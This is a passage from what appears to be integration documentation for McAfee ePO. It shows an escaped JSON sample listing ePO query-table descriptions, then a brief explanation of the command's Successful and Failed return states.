Recipients\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about systems that have been added to your System Tree.\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events History\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Custom Properties\\\",\\r\\n\\t\\t\\t\\\"Cases related to DLP incidents\\\",\\r\\n\\t\\t\\t\\\"Properties of the DLP client sessions\\\",\\r\\n\\t\\t\\t\\\"Retrieves information from Tags\\\",\\r\\n\\t\\t\\t\\\"VMware system properties are discovered by vSphere connector.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Scan Information\\\",\\r\\n\\t\\t\\t\\\"User Groups\\\",\\r\\n\\t\\t\\t\\\"DC Discovery and Monitoring Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee Client Proxy Properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves information from Agent Handlers.\\\",\\r\\n\\t\\t\\t\\\"Rolled Up Endpoint Security Web Control Events from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Custom Properties\\\",\\r\\n\\t\\t\\t\\\"Servers from which data is rolled up and used in multi-server queries.\\\",\\r\\n\\t\\t\\t\\\"Allows you to query upon log entries created by a task's subtask.\\\",\\r\\n\\t\\t\\t\\\"discovery_file_facts_table_name\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about executables in firewall rules created on client systems.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Registered Cloud Accounts for all Cloud vendors\\\",\\r\\n\\t\\t\\t\\\"Stores the vendor-specific properties for Cloud systems\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Agent Statistics Information\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"DLP Endpoint Properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves compliance counts over time across registered servers. This query type and its results depend on running a roll up data: Compliance History server task on this McAfee ePO server, which in turn depends on running a Run Query: Generate Compliance Event server task on each of the registered servers. These tasks create and combine the database records for this type of query. Click \\\\\\\"?\\\\\\\" for more information.\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error details\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Network discovery interactive action information \\\",\\r\\n\\t\\t\\t\\\"discovery_classification_facts_table_name\\\",\\r\\n\\t\\t\\t\\\"Contains a property with a comma-separated list of all products installed at the node.\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Export Details\\\",\\r\\n\\t\\t\\t\\\"Shows Threat Intelligence Exchange related System Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"Data Inventory from DLP Discover scans\\\",\\r\\n\\t\\t\\t\\\"DLP Capture Properties\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about what client task assignments are broken in the system hierarchy.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Policies of the DLP client sessions\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data at rest (Endpoint)\\\",\\r\\n\\t\\t\\t\\\"Cloud system properties common to VMs belonging to any vendor\\\",\\r\\n\\t\\t\\t\\\"Retrieves information from Extended Computer Properties\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.LocalNetworkDescription\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves summary data on systems managed by the registered servers. This query type and its results depend on running a roll up data: Managed Systems server task on this McAfee ePO server. Click \\\\\\\"?\\\\\\\" for more information.\\\",\\r\\n\\t\\t\\t\\\"Product Improvement Program Properties\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"System Health Indicator\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about Incidents-related DLP data at rest. As received from managed systems from selected registered servers.\\\",\\r\\n\\t\\t\\t\\\"Table to show Active Response custom events\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about client events from managed systems.\\\",\\r\\n\\t\\t\\t\\\"Product Coverage Reports Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Capture search list\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"Classification\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Client interface logon audit log\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Data Inventory from DLP Discover scans\\\",\\r\\n\\t\\t\\t\\\"Source Application Information \\\",\\r\\n\\t\\t\\t\\\"fwClientRule.RemoteNetworkDescription\\\",\\r\\n\\t\\t\\t\\\"System Tree\\\",\\r\\n\\t\\t\\t\\\"Select \\\\\\\"Issues\\\\\\\" to view issues created by users and reported by other extensions.\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee Threat Intelligence Exchange Server Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery interactive action information \\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Data Inventory from DLP Discover scans\\\",\\r\\n\\t\\t\\t\\\"Rolled up Endpoint Security Threat Events from registered servers.\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Data Inventory from DLP Discover scans\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Systems Per Product\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about client events sent from managed systems from selected registered servers.\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Platform Properties\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Endpoint System Threat Prevention Custom Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Azure Discovery Properties\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"capture_dataset_table_desc\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Destination User Information\\\",\\r\\n\\t\\t\\t\\\"Tag Groups\\\",\\r\\n\\t\\t\\t\\\"DLP Case Endpoint Discovery Incidents (Hidden)\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"DLP OCR Addon Properties\\\",\\r\\n\\t\\t\\t\\\"Server Keys\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Allows you to query upon messages logged by a top-level task.\\\",\\r\\n\\t\\t\\t\\\"capture_dataset_table_desc\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Retrieves information from Extended Computer Properties\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Tag Type Description\\\",\\r\\n\\t\\t\\t\\\"Retrieves information from Tags\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Retrieves information on DLP Data In-use/motion Incidents sent from managed systems from selected registered servers.\\\",\\r\\n\\t\\t\\t\\\"Destination User Groups\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Automatic Registration Documents Classification\\\",\\r\\n\\t\\t\\t\\\"Network discovery interactive action information \\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"DLP Monitor Properties\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"System properties specific to systems from Microsoft Azure.\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about status events from McAfee ePO.\\\",\\r\\n\\t\\t\\t\\\"Manual Registration Documents\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.ApplicationDescription\\\",\\r\\n\\t\\t\\t\\\"Table to show MVISION EDR custom events\\\",\\r\\n\\t\\t\\t\\\"Retrieves the blocked and whitelisted IP addresses.\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Cloud Volume belonging to any vendor\\\",\\r\\n\\t\\t\\t\\\"This is a combination of the ePO Threat Events data and the Endpoint Security Exploit Prevention Events data\\\",\\r\\n\\t\\t\\t\\\"Displays error conditions enforcing policy or collecting properties.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Properties of the DLP clients\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR System\\\",\\r\\n\\t\\t\\t\\\"Event Product\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"DLP Prevent Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DXLBroker Properties \\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Capture search results list \\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Retrieves LDAP information about systems that have been added to your System Tree.\\\",\\r\\n\\t\\t\\t\\\"discovery_incidents.classification_condition_desc\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about changes and actions made by users of this server.\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Common Appliance Management\\\",\\r\\n\\t\\t\\t\\\"Statistics About McAfee Product Usage\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.ApplicationDescription\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Agent Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Status of products like VSE, Host IPS, Application Control etc. on the Cloud systems\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about users and permissions of this server.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Shows DXL Broker related properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about Threat Events sent from managed systems.\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Stores the vendor-specific properties for cloud volume\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about what client tasks have been applied to what managed systems.\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Client Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Shows DXL Client related properties\\\",\\r\\n\\t\\t\\t\\\"Active Response Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Appliance Management Properties\\\",\\r\\n\\t\\t\\t\\\"Rolled up Endpoint Security Firewall properties from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Hyper-V system properties are discovered by Hyper-V connector.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Stores the vendor-specific properties for cloud volume\\\",\\r\\n\\t\\t\\t\\\"DLP Server Properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about Threat Events sent from managed systems from selected registered servers.\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Rolled up Endpoint Security Web Control properties from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Classification\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DC Assessment Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Retrieves technology information about Endpoint Systems\\\",\\r\\n\\t\\t\\t\\\"List Of Client Interface Locked Machines\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Host Cache Item Description\\\",\\r\\n\\t\\t\\t\\\"Cache Info Description\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"Rolled up Endpoint Security Threat Prevention properties from registered servers.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Allows you to query upon messages logged by a task's subtask.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Classification\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about DLP Operational Events sent from managed systems from selected registered servers.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Retrieves data on compliance counts over time. This query type and its results depend on a Run Query server task that generates compliance events from the results of a (Boolean pie chart) query. Also, when creating a Compliance History query, make sure that the time unit matches the schedule interval for the server task. McAfee recommends creating the Boolean pie chart query first, followed by the server task that generates the compliance events, and finally the Compliance History query.\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Aggregator Properties\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"System properties specific to systems from Amazon Web Service \\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error details\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data at rest (Endpoint)\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events History\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"Cases related to DLP incidents\\\",\\r\\n\\t\\t\\t\\\"Properties of the DLP client sessions\\\",\\r\\n\\t\\t\\t\\\"Info of Endpoint Discovery Scans\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"discovery_incidents.classification_condition_desc\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Scan Information\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information\\\",\\r\\n\\t\\t\\t\\\"User Groups\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"System Tree\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path\\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Table that holds the Discover Server Information\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data at rest (Network)\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"Data Inventory from DLP Discover scans\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error details\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Destination User Information\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"SessionRules_table_desc\\\",\\r\\n\\t\\t\\t\\\"Network discovery interactive action information \\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Export Details\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Source Application Information \\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data at rest (Endpoint)\\\",\\r\\n\\t\\t\\t\\\"discovery_incidents.classification_condition_desc\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Destination User Groups\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Network discovery interactive action information \\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Policies of the DLP client sessions\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data at rest (Network)\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Classification\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Status of Discovery scans\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"Properties of the DLP clients\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"Retrieves file paths from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves summarized non-Enterprise reputation for files from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"tieserver.fileParent.tableInfo.desc\\\",\\r\\n\\t\\t\\t\\\"Retrieves summarized Enterprise Reputation for files\\\",\\r\\n\\t\\t\\t\\\"Retrieves certificates information from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves associated certificate enterprise reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves certificates information from TIE Server\\\",\\r\\n\\t\\t\\t\\\"Retrieves certificates information from TIE Server\\\",\\r\\n\\t\\t\\t\\\"Retrieves file MWG reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves summarized non-Enterprise reputation for certificates from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves associated certificate GTI reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file information from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves summarized non-Enterprise reputation for files from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about systems with new certificates.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file information from the TIE Server.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about systems with new files.\\\",\\r\\n\\t\\t\\t\\\"Retrieves certificate GTI reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file GTI reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Certificates\\\",\\r\\n\\t\\t\\t\\\"Retrieves summarized non-Enterprise reputation for files from the TIE Server.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves file names from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file Enterprise reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves certificate Enterprise reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves file CTD reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"TIE Server cleanup trending summary\\\",\\r\\n\\t\\t\\t\\\"Retrieves file ATD reputation data from the TIE Server.\\\",\\r\\n\\t\\t\\t\\\"Retrieves files from the TIE Server.\\\"\\r\\n\\t\\t]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

